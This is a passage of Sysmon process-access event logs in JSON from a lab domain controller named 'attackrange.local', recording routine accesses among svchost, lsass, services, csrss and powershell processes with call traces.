C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.862","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":925,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.862\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.862","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":926,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.862\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 2112\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.862","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"2112","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":927,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.862\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 2112\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.862","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"2112","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":928,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.878\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.878","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":929,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.893\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.893","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":930,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":931,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":932,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.893\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 